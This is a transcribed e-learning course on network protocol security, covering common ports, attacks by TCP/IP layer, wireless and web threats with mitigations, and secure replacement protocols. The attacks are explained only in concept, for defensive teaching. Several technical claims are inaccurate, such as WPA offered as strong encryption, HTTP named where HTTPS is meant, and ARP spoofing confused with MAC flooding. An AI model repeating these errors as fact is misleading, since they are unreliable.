responsibilities they will have in security first mindset in your organization will
differ. For instance, a user lower in the hierarchy would have to comply to certain
rules and regulations. However, the senior management will have a critical role to
play when implementing security first mindset. Because they have to not only make
strategic decisioning, but also they have to set an example in front of the other
users. They have to think from security perspective. So and they have to ensure that
security is the highest priority for everybody in the organization.
Now, when you have security as your first priority and the highest priority, it can
be ensured that it will keep your business running safely. Given the today's
environment on the Internet, there are thousands of malware being created every
day. There are new hackers are coming in. Then there are people who are just
hungry for not only information, but they are hungry to steal that information and
sell it out in the black market. Which is known as the underground web or dark
web. So therefore, to ensure that everybody is sensitive about security, you have to
ensure that it drills down from top to bottom. With this approach, it will keep your
business running safely.
You will also have to bring innovation in keeping information safe, you cannot live
with outdated security infrastructure. There are new malware coming, there are new
threats that are coming up every day. So you will have to keep evolving your
infrastructure. You have to be innovative. Think like a hacker, then only you can
tackle a hacker. Otherwise, if you're two steps behind the hacker, then there is no
way you can keep your information safe. So what does security first mindset
require? So it has to be integrated with multiple components in your organization.
It has to start with your business vision and mission. So your business vision and
mission, while they are focusing on the business of the organization, they also have
to tackle the security problem. Because if your organization is wanting to grow and
ensure data safety, then they have to start aligning their business vision and mission
with security.
Then comes the people. Now, people are the most critical point in the security
chain. They are the ones that are also the weakest point in the security chain.
Therefore, people have to be trained properly in the security domain. They have to
be made aware of the basic level of threats and how to mitigate them. And trainings
that you provide to the users cannot be one time. They have to be ongoing, as in
when there is a change in the security posture in your organization, you've to ensure
that users are trained. Then comes the processes and procedures. Many
organizations do not align their processes and procedures with security.
You've to ensure any process or procedure running in your organization has to be
looked at from the security point of view. For instance, your client requires data to
be uploaded on FTP. Now, that is confidential data the client is asking you to
upload in FTP server. Now, if your process allows you to upload that data and the
security is not looked at when uploading the data, anything can happen. Anybody
can sort of hack the FTP server and take away the data. So therefore, one process or
procedure could be you will not use the FTP server. There is a in house FTPS
server that has been implemented, you can use that to upload data. So therefore,
now you have ensured that process and procedures are aligned with security. You
have to also ensure it is not only your organization, but also the partners that you're
dealing with. If your partners are not equipped with enough security and they're
connecting with your network, be assured that sooner or later hackers are going to
come to your network as well. And it will not be your fault, but it will be the
partner who has invited the trouble.
Your various organizational units. Every organization has multiple organizational
units. So each organizational unit may have different security problems, may have
different security needs. You have to ensure that they are tackled. Your marketing
and sales team. They have to be also updated with the latest security posture. And
they have to be also appraised of what is going on within the organization, as far as
security is concerned. So in totality, if you look at you have covered most of the
aspects of an organization. And if you integrate all of them with security, then you
are talking about the security first mindset. But how do you implement security
first mindset?
[Video description begins] Security-first Mindset - How? [Video description ends]
The biggest question is, how? And the easiest answer is, make sure your security
decisions are taken early on. Which means every project you do, every new process
you implement, every change in the infrastructure you make, you make sure you
consider security. You have to ensure security is integrated in any decisioning that
you make. It cannot be that you have set up a new network, but you have not
thought of security. After implementing the network, you're talking about security,
how do I secure this network? It is not going to work.
First you have to think about the security, then you have to implement the network.
Therefore, you'll be able to make the right decision at the right time. You've to also
ensure security is tightly integrated into your business, just like the good old era
security cannot be isolated anymore, it cannot run in silos. Your business has to
integrate security tightly, which means your top management or the senior
leadership has to start talking about the security. If they want to secure the business
and its information. And it is also important, even though you may not be required
to opt for a compliance program. But it is also equally important that you should
align your security policies and everything to a compliance program, even though
you don’t go and get yourself certified. But being compliant is always good. This is
because your partners, your vendors, your clients will have more trust in you if you
have complied to a security standard. Maybe it could be PCI DSS if you are into
credit card transactions or it could be as generic as ISO 27001. Depending on your
requirement, make sure you have compliance implemented within your
organization.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of security protocols and
to learn how they play a key role in network security. We did this by covering the
common protocols and their security vulnerabilities. We also looked at the risks
around certain networking protocols, but security protocols as a replacement of the
legacy ones. Moving on, we also looked at security protocols and their usages.
Finally at the end, we also looked at the importance of security-first mindset. In our
next course, we will move on to explore the hardened security topologies and their
importance.
Information Security: Securing Networking
Protocols
Learners can explore the key concept of the common protocols in use, and discover
the security issues of the transmission control protocol/Internet protocol (TCP/IP)
model and security protocols, in this 10-video course. You will begin by taking a
look at the common protocols used in a network, the ports they use, and the type
they are and what they do. Next, you will examine some of the security issues of
the TCP/IP model at the layer level, of which it has four: application, transport,
Internet, and data link. You will also explore the threats, vulnerabilities, and
mitigation techniques in network security; identify the types of weak protocols and
their replacements; and classify the various types of security protocols. Then
learners will continue by examining various ways to use security protocols in
different situations; the importance of implementing security protocols. In the final
tutorial, learners will explore the security-first mindset and its necessity.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT
infrastructure operations, software development, cyber security, and e-learning. In
the past, I worked under different capacities in the IT industry. I've worked as a
Quality Assurance Team Leader, Technical Specialist, IT Operations Manager, and
Delivery Head for Software Development. Along with this, I've also worked as
Cyber Security Consultant. I have a Bachelor's Degree in Psychology and Diploma
in System Management. My expertise are IT operations and process management. I
have various certifications which are, Certified Network Defender, Certified
Ethical Hacker, Computer Hacking Forensic Investigator. Other than these
certifications, I also have few certifications from Microsoft, which are MCSE,
MCSA and MCP. I'm also Certified Lotus Professional.
In this course, we will learn about the common networking protocols and their
security vulnerabilities. We will also focus about the risks around certain
networking protocols. Then, we will look at common security protocols and how
they are used on a network. Finally, we'll also learn about the security first mindset.
Common Protocols
[Video description begins] Topic title: Common Protocols. The presenter is Ashish
Chugh. [Video description ends]
When we talk about protocol, it is a method of doing something in a way which
two parties can understand. Similarly, in networking a protocol is a set of rules that
defines the communication between two or more devices. When you talk about a
protocol, it also defines the format of messages exchanged between two or more
devices. For example, let's talk about two human beings. One knows German, one
knows French. Now, they will not be able to communicate with each other unless
either both of them speak German or both of them speak French. Therefore, a
protocol works in the similar fashion on a network. Two devices that need to speak
to each other, they need to have a common protocol. Now this common protocol
could be anything. As long as both the devices are using the same one, they will be
able to communicate with each other. A protocol can be implemented either by a
software, or a hardware, or it could be implemented by both. It is not necessary that
only a software can implement a protocol. Even two hardware devices, when they
need to communicate, they need to have a common protocol being used.
[Video description begins] Common Protocols. [Video description ends]
So let's now look at some of the common protocols and the ports they use, and the
type they are, and what they do. So first one is File Transfer Protocol, which is
FTP.
[Video description begins] The type for File Transfer Protocol is TCP and the port
is 20/21. It is used for transferring files between a server and a client. [Video
description ends]
FTP is a very common protocol that is mostly used for uploading and downloading
files. So if you need to exchange files with multiple clients, you can simply put
together a FTP server and upload the files. Now, users who have either the user
credentials to access the FTP server, they can access those files. Or you could also
enable anonymous authentication, which means anybody knowing the IP address or
the FTP server name can connect to it and download the files. Then you have
something called Secure Shell, which is very commonly known as SSH. It is a TCP
type protocol. It works on port 22. And when you need to connect a remote session
with a system in a very secure way, which means that it needs to be encrypted, then
you can use SSH. Telnet, on the other hand, works in the similar fashion as SSH.
However, it does not create an encrypted session, all the information that travels on
the channels established by Telnet is in clear text format. Then we come to Simple
Mail Transfer Protocol, which is known as SMTP.
[Video description begins] The type for Telnet protocol is TCP and the port is 23. It
is used for establishing a remote connection to a device. [Video description ends]
It is a TCP type protocol, works on port 25, and it is mainly used for sending
emails. So when a client is sending an email, it is using SMTP. Then no network
can work without a DNS, unless or until they do not require name resolution. It is a
both TCP/UDP type protocol, it works on port 53, and mainly it is used for name
resolution. So for instance, if you type www.google.com, then there has to be a
mechanism which can translate this domain name into an IP address. That is the
role DNS plays. Then next comes the Dynamic Host Configuration Protocol, which
is the DHCP. It is a UDP type protocol, works on port 67/68. It uses both these
ports. One is for sending the request, another one is for receiving the IP address.
Then it is mainly used for distributing IP addresses on the network.
[Video description begins] The Dynamic Host Configuration Protocol is used for
leasing IP addresses to the clients on a network. [Video description ends]
Now you have to define a pool of IP addresses that can be leased out to the clients
on the network. Once the IP pool is exhausted, clients will not be able to obtain the
IP address. Therefore, whenever you create a DHCP server, you have to ensure that
there are enough IP addresses that can be leased out. Then comes the Trivial File
Transfer Protocol, which is known as TFTP. It is a UDP type protocol, works on
port 69. And it is mainly used for transferring files between two devices. And the
biggest thing about this protocol is you don't have to establish a session. So this is
commonly used with routers, switches where you have to upload a certain file
which could be their updates, or flash ROM file, or something like that. If you need
to upload it into routers and switches, you normally use TFTP.
Then comes the Hypertext Transfer Protocol, which is very commonly known as
HTTP. It is a TCP type protocol, works on port 80. And any time you would have
browsed a website, it is by default using a port 80. Unless you are using HTTPS,
which will use port 443. However, you do not have to suffix this particular port at
the end of the website name or the URL. Because the web browser, by default, if it
doesn't find a port number, it will assume that the request is being sent to port 80 if
HTTP is being used.
Post Office Protocol, which is known as POP. There have been many variants. The
current version is version 3, there was version 1 and 2 earlier. It is a TCP type and
works on port 110. It is mainly used for downloading emails from a messaging
server. But once it downloads the emails, it deletes it from the messaging server.
Then comes the Network Time Protocol, which is known as NTP. It is a UDP type
protocol, works on port 123. And it is mainly used by all devices on a network to
synchronize their time with the NTP server. Now NTP server, your organization
can set it up internally on their network, or it could be a NTP server somewhere on
the Internet. There are open NTP servers which are being used to synchronize time
with.
Let's now talk about Internet Message Access Protocol, which is known as IMAP.
It is a TCP type protocol, uses port 143. And it is also used to download emails
from a messaging server. Now the difference between POP3 and IMAP is where
POP3 deletes the mails or the emails from the messaging server, IMAP does not do
that. It will retain one copy on the messaging server but also download one copy on
the client desktop or laptop. Then you have Simple Network Management Protocol,
which is known as SNMP. This is a TCP/UDP type protocol. It uses port 161 and
162. It is mainly used for monitoring devices on the network. Then you have the
Border Gateway Protocol, known as BGP.
[Video description begins] The Simple Network Management Protocol is used for
monitoring, configuring, and controlling network devices. [Video description ends]
It's a TCP type protocol. It uses port 179. And BGP is mainly used for maintaining
the routing tables on the Internet. Finally, we come to Lightweight Directory
Access Protocol, very commonly known as LDAP. It is a TCP/UDP type protocol,
uses port 389. And it is a centralized repository to maintain information about
users, computers, groups, and various other types of information. Active Directory
is one of the most commonly known implementation of LDAP.
[Video description begins] The Lightweight Directory Access Protocol helps to
access and maintain distributed directory information. [Video description ends]
Security Issues of TCP/IP Model
[Video description begins] Topic title: Security Issues of TCP/IP Model. The
presenter is Ashish Chugh. [Video description ends]
Now, moving ahead, we will also look at the security issues of the TCP/IP model.
Now, this TCP/IP model has four TCP/IP layers, which are application, transport,
internet, and data link. Each layer has certain number of protocols that work on it.
So for instance, on application layer, you have various protocols, and it has the
maximum number of protocols running. So some of these protocols are like DNS,
DHCP, TFTP, FTP. Just a while back we did talk about most of these protocols.
Then we come to the transport layer which is the TCP and UDP protocols.
[Video description begins] Application layer includes the following protocols:
DNS, DHCP, TFTP, FTP, HTTP, IMAP4, POP3, SMTP, SNMP, SSH, Telnet,
TLS/SSL. [Video description ends]
Moving on to Internet, it has two versions of IP which work here, which is IPv4
and IPv6. Other than that, you have ICMP protocol which is mainly used with the
ping command. Then you have IGMP, and the data link layer has the ARP
protocol.
[Video description begins] Security Issues of TCP/IP Model - Application
Layer. [Video description ends]
Let's now look at some of the security issues with the protocols that exist on the
application layer. So when you talk about HTTP, you have various type of security
issues ranging from caching, replay attack, cookie poisoning, session hijacking,
cross-site scripting. Now, we are not going to get into detail of every type of
security issue, but we will talk about at least one or two of them. So let's talk about
session hijacking. It is also known as cookie hijacking. Which is the method of
exploiting a valid session to gain unauthorized access to information or service.
Then comes the cross site scripting, which is very commonly known as XSS. This
is the type of attack in which attacker injects malicious client side scripts into web
pages. So these client side scripts basically are intended to be downloaded onto the
user systems who have connected to that particular web page. When you come to
DNS, again, just like HTTP, there are various types of security issues. So talk about
DNS cache poisoning.
[Video description begins] The various types of security issues with DNS are as
follows: DNS Spoofing, DNS ID Hijacking, DNS Cache Poisoning, DNS Flood
Attack, and Distributed Reflection Denial of Service(DRDos). [Video description
ends]
It is also known as DNS spoofing, in which an attacker alters the DNS records to
divert Internet traffic from legitimate DNS servers to the malicious DNS servers.
And the problem with this type of attack is it can spread from DNS server to DNS
server. That is because when the zone information is being replicated between one
or more DNS servers, then this type of attack can spread. Because you end up
copying invalid cache to the other servers. Let's now talk about DNS flood attack,
which is a type of denial of service attack in which an attacker sends a lot of
request to the DNS server. Till the time DNS resources are consumed and DNS is
exhausted and cannot serve anymore. Moving on, let's talk about FTP. Now, FTP
has various types of attack, just like HTTP and DNS. One is FTP brute force attack,
in which the passwords of FTP servers are brute forced so they can be revealed, and
FTP servers can be accessed.
[Video description begins] The various types of security issues with FTP are as
follows: FTP Bounce Attack, FTP Brute Force Attack, Anonymous Authentication,
Directory Traversal Attack, and Dridex-based Malware Attack. [Video description
ends]
Then you have the directory traversal attack, in which an attacker gains access to
credentials. And accesses the restricted directories on the FTP server. Moving on,
when you talk about Telnet, there is a sniffing attack.
[Video description begins] The various types of security issues with Telnet are as
follows: Sniffing, Brute Force Attack, and Denial of Service(Dos). [Video
description ends]
Telnet sends the traffic in clear text format, which means it can be easily
intercepted, and it can be read out by the attacker. So this is the type of attack
which is known as sniffing. Then again, it is also prone to denial of service attack,
which is DoS. So that these are a couple of main security issues with the Telnet
protocol. Then if you look at DHCP, again, there are various types of security
issues with DHCP. So one is DHCP starvation.
[Video description begins] The various types of security issues with DHCP are as
follows: DHCP Spoofing, DHCP Starvation, Rogue DHCP Server. [Video
description ends]
An attacker sends lot of forged requests to the DHCP server to exhaust its IP pools.
So which means there are bogus or there are rogue request that are being sent to the
DHCP server. And DHCP server keeps on leasing the IP addresses till the time it
runs out of its IP addresses from its IP pool. Then comes the rogue DHCP server
attack, in which an attacker or a user on the network sets up a DHCP server which
starts to lease out IP addresses on the network. Now, there is already a legitimate
DHCP server which has leased out IP addresses. There is another rogue DHCP
server which has come up. So this rogue DHCP server will also start leasing out IP
addresses to the nearby clients and eventually it will start spreading. So therefore
the clients will start accepting the IP address from this particular DHCP pool.
[Video description begins] Security Issues of TCP/IP Model - Transport
Layer. [Video description ends]
When you talk about TCP, there is a SYN attack with which is a type of denial of
service attack.
[Video description begins] The various types of security issues with TCP are as
follows: SYN Attack, TCP Land Attack, TCP Sequence Number Prediction, IP Half
Scan Attack, and TCP Sequence Number Generation Attack . [Video description
ends]
An attacker sends a large number of SYN requests to a server. And the server
attempts to respond to every single request and therefore runs out of resources and
crashes or freezes. So that is the outcome of the SYN attack. Now when you talk
about TCP land attack, it is a layer for denial of service attack in which attacker
sends TCP SYN packets. Which are spoofed and have source and destination IPs to
be the same. So which means, now when the attacker sends out the TCP SYN
packets to a server, it appends the source and the destination address as the same.
When the server receives the request and attempts to respond, because the source
from where the packet came from is the same as where it was intended to be, it is
the same. The server eventually gets confused and starts consuming resources and
eventually crashes. When you talk about UDP, so there is a UDP flood.
[Video description begins] The various types of security issues with UDP are as
follows: UDP Flood, UDP Amplification, NTP Amplification, and Volume Based
Attack. [Video description ends]
It is a denial of service attack, in which an attacker sends UDP packet to a server.
And the result is same. The packets are sent in large quantity and eventually the
server gets exhausted from its resources and crashes or freezes. Then you have the
NTP amplification attack. It is a distributed denial of service in which attacker
exploits an NTP server with UDP packets.
[Video description begins] Security Issues of TCP/IP Model - Internet
Layer. [Video description ends]
Then we come to IP. When you talk about HTTP flooding, it is a distributed denial
of service attack in which an attacker sends out a large number of HTTP requests to
attack a web server or a web application.
[Video description begins] The various types of security issues with IP are as
follows: SYN Attack, HTTP Flooding, IP Spoofing, Brute Force Attack, and
Clickjacking. [Video description ends]
Eventually, either one of them which is being attacked attempts to respond to these
requests. And finally ends up exhausting the resources of the server and crashes.
Then you have Clickjacking attack. An attacker embeds a malicious link which is
sort of hidden on the webpage. So when the user clicks on the malicious link the
attacker can take control of their system. Moving on to ICMP.
[Video description begins] The various types of security issues with ICMP are as
follows: Fragile Attack, Smurf Attack, and ICMP Tunneling Attack. [Video
description ends]
There is a smurf attack which is a distributed denial of service attack in which the
attacker, using multiple or several hundred bots, sends ICMP packets using a
spoofed IP address. So which means you have no way of getting back to the
attacker or tracing the attacker because every request is coming from a spoofed IP
address. Then you have IGMP, which is prone to distributed denial of service,
DDoS, attack.
[Video description begins] The various types of security issues with IGMP are as
follows: Distributed Denial of Service(DDos) and Multicast Routing. [Video
description ends]
Now DDoS is something which uses hundreds or thousands or even millions of
bots which are known as zombie systems. And they attack a particular server. In
which the server, because it is receiving request from hundreds and thousands of
bots from the Internet, it cannot handle those requests and eventually crashes.
[Video description begins] Security Issues of TCP/IP Model - Data Link
Layer. [Video description ends]
Now, moving on to ARP. So when you talk about ARP, there is ARP spoofing, in
which the attacker sends large number of Ethernet frames with fake MAC
addresses to a switch.
[Video description begins] The various types of security issues with ARP are as
follows: Connection Resetting, Man in the Middle (MITM), Packet Sniffing, Denial
of Service (DoS), ARP Cache Poisoning, MAC Address Flooding, and ARP
Spoofing. [Video description ends]
And eventually fills it up with the spoofed ARP addresses, and then switch is not
able to cater to the legitimate requests.
Threats, Vulnerabilities, and Mitigation
[Video description begins] Topic title: Threats, Vulnerabilities, and Mitigation. The
presenter is Ashish Chugh. Threats and Mitigation - Wireless. [Video description
ends]
So not only the wired networks have threats and they have security issues, but it is
the wireless network which is also prone to multiple types of threats. And of course
then there are various types of mitigation methods that can be used. So let's now
look at some of these threats and how they can be mitigated. So first one is war
driving. So in this type of attack, you simply roam around in a car across the streets
and in the market and try to find an open wireless network that you can connect to.
So the mitigation method could be simply decrease the wireless range and hide the
SSID. Now, there is no guarantee hiding the SSID would work because there are
tools which can discover even the hidden SSIDs. But it can still work as a
mitigation method. Then you talk about war chalking. In this type of threat,
basically the attacker marks the area after SSID and its credentials are known. So
once the attacker has discovered, not only the SSID, but also the credentials,
basically the walls of that particular building are marked. So the attacker knows
this is where I've discovered a wireless network, and I know the credentials.
Mitigation method is the credentials were discovered because you were using a
weak security protocols like WEP. So you have to use WPA2.
You can also enable MAC filtering. Now when you enable MAC filtering, it is a
simple thing. Only the MAC addresses that are embedded or that are added into the
wireless access point, they'll be able to connect to the wireless network. Then you
have to also disable SSID or hide the SSID. Moving on, WEP/WPA cracking, now
these both were weak security protocols. In fact, lot of wireless routers now don't
even support WEP. They support WPA and onwards, which is WPA2 and various
other protocols. But now when you talk about cracking WEP or WPA, you are
basically scanning and determining the pre-shared key. Which is nothing but the
password that has been set for the wireless network. To mitigate this, you have to
use strong encryption protocol such as WPA. And of course, along with that you
can also use complex passwords so they are not easy to determine, or they are not
easy to crack. When you talk about evil twin, you just simply set up a rogue access
point for the legitimate users.
[Video description begins] For Evil Twin you set up a rogue AP for the legitimate
users to sniff the data. [Video description ends]
Now, what happens is when users find another wireless access point to which they
had been connecting, now when the users find another access point with the same
name, they're likely to get confused which is the legitimate one. So some people
will simply try the evil twin access point. And once they connect, they will provide
the username and password. And there you go, you are able to capture their
credential. How do you protect this, or how do you mitigate this threat? You simply
implement something known as Wireless Intrusion Prevention System, which is
WIPS. Then comes the rogue access point. This is an access point which is
installed without the knowledge of the IT team. Now anybody could simply bring a
wireless access point, connect it to the Ethernet network or the wired network, and
it will start broadcasting its SSID. It's as simple as that. There are ways to mitigate
that, something like enable switch port tracing. Or you could also do mode
scanning. Or you can also implement a application which is known as the rogue
detector. You can use different methods to detect a rogue access point.
Now let's look at some of the threats and mitigation methods of a network which is
a wired network. So first one is ICMP flood. In ICMP flood an attacker sends a
large number of ICMP packets to a system or a server. Which means the server or
the system is receiving so many ICMP packets in a continuation that it is unable to
respond to each and every packet. Now system attempts to do that, but as a
consequence it starts to exhaust its resources. Therefore, it is unable to handle all
the request and eventually crashes. So how do you mitigate this threat? You simply
enable the firewall to block ICMP packets on the server or the device. Then there is
a denial of service and distributed denial of service type of threats. Now denial of
service is from one system to another system.
[Video description begins] DoS/DDos threat puts a system or network to a halt
after saturating its resources. [Video description ends]
But when you talk about distributed denial of service, it has hundreds or maybe
thousands of systems focusing on one single server or a system, and sending lot of
packets at the same time. Now because when you talk about one-to-one, there is
only limited number of packets that will come. But when you talk about distributed
denial of service, then there are thousands of nodes sending the request to a single
node. Which means the power of that particular attack has multiplied by few
thousand times. And the server is unable to take that much load, and eventually
crashes. So how do you mitigate this? First, you baseline your network traffic. You
see what is the normal traffic pattern and keep monitoring your network traffic to
ensure that this pattern is not deviated from. And if there is a deviation which is
alarming, then you know there is something that is not right.
You can also compare signatures of the incoming traffic. So there are applications
and there are hardware devices which can help you map the signature of the
incoming traffic. And once you know if it is not a common signature, it is
unidentified signature, that means there is something wrong. So you can block that
traffic. And now there are anti-DoS and anti-DDoS devices that are available in the
market which are designed to protect your network or servers from these type of
threats. Then you can buy that device, implement it on the network, and you will be
able to protect your network or the server. Then comes the Fraggle threat in which
attacker sends spoofed UDP packets to a specific broadcast address of a system, or
a server, or a device. Now how do you mitigate this threat?
You simply disable the IP broadcast on the network and also enable the firewall to
block ICMP packets. Then there is buffer overflow, in which there is a malicious
code in an application which puts more data in the buffer that it can handle. So
when the buffer is filled, it is not able to cater to any of the requests on the system,
and eventually it causes the application to crash. So how do you mitigate that? You
have to detect vulnerabilities in the code. Because if there is a vulnerability in the
code, an attacker could have embedded something in the code which would have
caused the buffer overflow. Now let's look at the threats and mitigation methods of
web applications. So first one is injection.
Now in this, an attacker injects malicious code or a script into the web application's
code. And this is because the web applications have vulnerabilities, and they are
not sanitized, or the data being input is not validated properly. So the attacker can
simply embed some data into a field and inject something that is not safe for the
web application. Now when malicious code or script is embedded into the web
application, it can trigger lot of unexpected actions which the application is not
designed to handle. So you have to perform server-side validation in which any
data that is being triggered from the web application and going to the backend, it
must be checked through server-side validation. And also when a user is inputting
something into a field, you have to validate that and then sanitize if required. So for
instance, when you talk about validation, now if there is a telephone field where
you are expected the user to input a telephone number.
Now this particular field should not take any characters, it should only take
numbers. So if user is typing any other character other than number, that means the
input has not been validated. If it was being validated, then it would have prompted
the user with a message something like, this is not the correct input. You have to
input numbers only. And then there could be sanitization of the input data. For
instance, if you are expecting the user to put everything in capital letters, and the
user input something in the lowercase letter. Then you can sanitize that and convert
the lowercase into uppercase. This is just one example, there could be many other
things that can be sanitized.
Let's talk about broken authentication. This is basically when an attacker brute
forces an application or brute forces a web page to gain access to the user
credentials. Now in this, basically passwords are the output of these attacks. When
the passwords are gain, then the attacker is able to use these passwords and the user
credentials to get into the application. How do you mitigate that? You can
implement multi-factor authentication. Which means not only the user has to
provide the password, but you could also send one-time password to the user. So
which means along with this permanent password, there is a one time password
which has a maybe 15 minutes validity.
The user has to provide the OTP also, along with the password. Unless both these
things match from the backend, the user is not granted the access to the application.
And of course, other than just simply implementing the password, you have to
ensure that you implement complex passwords. User should not be using simple
passwords, such as password12345, something like that. So you have to make sure
that users are forced to use complex passwords. So you can always put a password
policy on the domain controller. Or using your LDAP directory, you can implement
password policies. And once the password policies are implemented, then users
will be forced to use complex passwords.
Now let's move on to sensitive data exposure. This is when either the encryption
keys are stolen, which means your private key is compromised. Or there is a manin-the-middle attack that happened in a transmission of information which was
being done in cleartext format. So these are just two examples how sensitive data
can be exposed but there are various other ways. For instance, giving incorrect
access to somebody who doesn't need that particular access on a web server or a
file server. How do you mitigate this kind of threat? So you avoid storing sensitive
data. So you should avoid storing sensitive data. This means your sensitive data
should not be lying around on some file server or a web server out in open. It has to
be secured. It has to be. If it does not require regular access, then you should back it
up and store it in a safe area. And if it requires regular access only by a few
individuals, then ensure that only those individuals have appropriate access.
When you are sending data from one end to the other end, which means sending
one device to the other device, specially on the Internet, you need to make sure that
you encrypt your data. Sending data in cleartext can be easily intercepted by any
third party who's watching over you. Then disable caching because caching can
also store large amount of data. And if somebody gets hands on the caching of a
particular web server or a particular server, then that person is able to not only
retrieve data, it is also possible to retrieve user credentials from caching. Now when
you talk about security misconfigurations, this is one of the most common mistakes
made by the web server administrators. Where they tend to not only give out access
to individuals who don't require it, but also they add services which are not
supposed to be running on that particular web server.
For instance, if you have no use of FTP, then the administrator would simply
configure FTP as well along with the HTTP. So that is not required. Why would
you want to configure FTP if it is not required? Because even though there is no
data on it, but that particular service can be exploited. So in brief, when you talk
about security misconfiguration, this type of attack is mainly on the user accounts.
Which means they could be using the default accounts that exist on a system. Or it
is the default configuration. For instance, you have just implemented the web
server. It has lot of services running which you don't require. So if you don't
require, the best thing is to shut them down. And of course, it is not only the web
server which can cause this kind of threat. You have to ensure the operating system
on which the web server is running is hardened. And it also does not run
unnecessary services. It does not have open ports which are not required. So this
type of mitigation has to come from the bottom up. So first you have to ensure that
your operating system is secured. Then you have to ensure that your web server is
secured. Then you have to move on to the web application which is being hosted.
You have to ensure that is also secured. So all three components must be secured.
Weak Protocols and Their Replacements
[Video description begins] Topic title: Weak Protocols and Their Replacements.
The presenter is Ashish Chugh. [Video description ends]
Let's now look at some of the weak networking protocols and their replacements.
So first one is Telnet, a little while back we discussed Telnet is a protocol that
establishes a session with a remote host but sends the information in cleartext
format. Therefore, anybody can intercept the information, and its replacement
protocol is SSH which creates a encrypted tunnel and encrypts the information
being sent from one host to the other host. Then comes the rsh, which is prone to
eavesdropping and credential stealing attacks. Again, the replacement for this
protocol is SSH.
Moving on to rcp, which was used for copying files from one host to another host.
So one is your system, let's say, and another one is the remote host, you would use
rcp command to copy files from and to the server. Now this, again, had the same
problem because the information was being sent in cleartext. Now SSH is, again,
the replacement for this. Then comes the rlogin protocol which is mainly used on
UNIX and it works in the similar fashion as Telnet. Both had the same problem
which was sending the information in cleartext, therefore SSH comes in as a
replacement. Finally, you come to FTP, which is File Transfer Protocol. A little
while back, we discussed FTP is prone to different type of security issues which are
like FTP brute force attack, or anonymous authentication, directory traversal attack.
So therefore, FTP is not a safe protocol to use when you're sending information
which is confidential and sensitive over the Internet.
The best is to use secure FTP which encrypts the information and now it's a bundle
of FTP plus TLS. Then we come to HTTP. Now HTTP is good for static sites
which do not have to manipulate data or does not use dynamic data generation. So
for instance if you're doing search, then it is not going back to the database and
fetching information. Now if you are using HTTP with any site that handles
monetary transactions or it handles data which has to be queried from, then it is a
wrong protocol to be used because it sends the information in cleartext format
which can be easily intercepted.
To give you an example, if you have hosted a website which contains a login page.
Now this website is hosted using HTTP protocol. When you enter the username
and password, somebody sitting on your network or somebody who can access
your transmission can easily use a tool like Wireshark to intercept the data and
figure out the username and password. Because it will be captured in the exact
same manner like you have logged in to the website. So example, your username is
admin, password is password.
The Wireshark application will be able to capture this information, and the attacker
will be able to easily guess what your user credentials are. So as a replacement you
can use HTTP, which is HTTP plus TLS, transport layer security protocol. So now,
when you use the same application with HTTPS, the information is encrypted and
therefore is not visible when somebody intercepts the data flowing out from the
web application. SNMP was known for many vulnerabilities.
Now most of the vulnerabilities have been covered in the latest version, which is
SNMPv3. There are more enhancements that are happening to this particular
protocol but SNMP3 is the most widely used. Then you come to IMAP. So there is
now a new version which is IMAP over SSL and TLS. So SSL is also not being
used, it's been broken multiple times, so best is to use IMAP over TLS. Similarly to
that, POP3 you also can use with TLS and SSL. As I just said, SSL has been
broken many times which means people have been able to break it and capture data
from the transmission which was using SSL. Now the best thing to do is use TLS.
Types of Security Protocols
[Video description begins] Topic title: Types of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at various types of security protocols. Before we do that, let's look
at various features of the security protocols. So, first of all, any security protocol
that you talk about, it does not work on its own. So it has to work with the
underlying protocol. So take an example of HTTPS. Now, HTTPS does not work
on its own. It has to use HTTP as the underlying protocol. Then if you talk about
FTPS or SFTP, FTP is the underlying protocol. So therefore, so there has to be a
protocol with which the security protocol is bundled. Then the one of the main
reason for using a security protocol is to ensure the data is protected. And that is
done by ensuring the security protocol is able to ensure the integrity and the
confidentiality of the data.
Depending on which one you use, it can either do both, or it might just do one of
these things, which is either integrity or confidentiality. However, it depends on the
type of security protocol you use. And in many cases, it can also secure the delivery
of information. Which means if you take a protocol like IPSec or SSH, it encrypts
the information before sending it to the recipient. So therefore the information is
secured. And of course, not all security protocols same in nature, some are used
with the messaging, some are used with the web application, some are used
between host-to-host communication. So you will look at some of these going
ahead. So the first one to look at is IPSec, which is IP security. It encrypts the
communication between two hosts to ensure integrity and confidentiality. Then you
talk about transport layer security, which is TLS. It is mainly used with web
applications to ensure data is encrypted between the web server and the client.
OpenPGP, it is one of the standards for email encryption. It ensures privacy and
integrity of the messages. When you talk about secure socket shell, which is SSH,
we talked awhile back about SSH, it creates an encrypted channel between your
system and the remote host to which you want to connect. And then it allows you to
send information. Now since the channel is encrypted, it is not possible to intercept
that particular channel via man-in-the-middle. Anybody else cannot sniff that
traffic. Then you have secure multipurpose Internet mail extensions, known as
S/MIME, which uses public key encryption and signs the MIME data. It is mainly
used for encrypting emails. Then we have domain name system security extensions,
commonly known as DNSSEC, which is used to protect cache resolvers and stops
the manipulation of DNS data from cache poisoning. Then we move on to secure
real-time transport protocol, which is known as SRTP. It is used for packet
encryption and also prevents from the replay attack. Moving on, then we have
network time protocol secure, which is known as NTPSec. Now, it is a securityhardened implementation of NTP. Then we have File Transfer Protocol secure,
which is known as FTPS. It is also known as FTP Secure, and it basically adds or
bundles up TLS with FTP.
Uses of Security Protocols
[Video description begins] Topic title: Uses of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the uses of security protocols. Now, in totality, if you
look at most of these security protocols are designed to protect the information in
whichever way possible. So they could be protecting the integrity, or the
confidentiality, or they could be encrypting the information to protect the data that
is in transit or data at rest. It depends which security protocol you are using and
how you're using it. So now one of the biggest use is that when you are sending
information over the Internet specifically, then you have to ensure that the
information must be encrypted. So you can use a security protocol to ensure this.
And, of course, along with that, when the data is at rest, which means it is in
storage on a server, then the data has to be encrypted. So information or the data at
any cost needs to be protected and that is where the security protocols come in. So
you have to encrypt the information, whether it is being at rest or it is being in
transit, it has to be encrypted. And the only reason you would want to encrypt the
information is because you want to ensure the integrity and the confidentiality of
the data.
You do not want anybody who does not have access to access that information.
And security protocols also help you secure application level data transport. Which
means if the data is flowing out of the application, then it needs to be secure. So
you have to build mechanism like TLS within the application to ensure the data is
encrypted. It also helps you perform entity authentication. So anybody who's
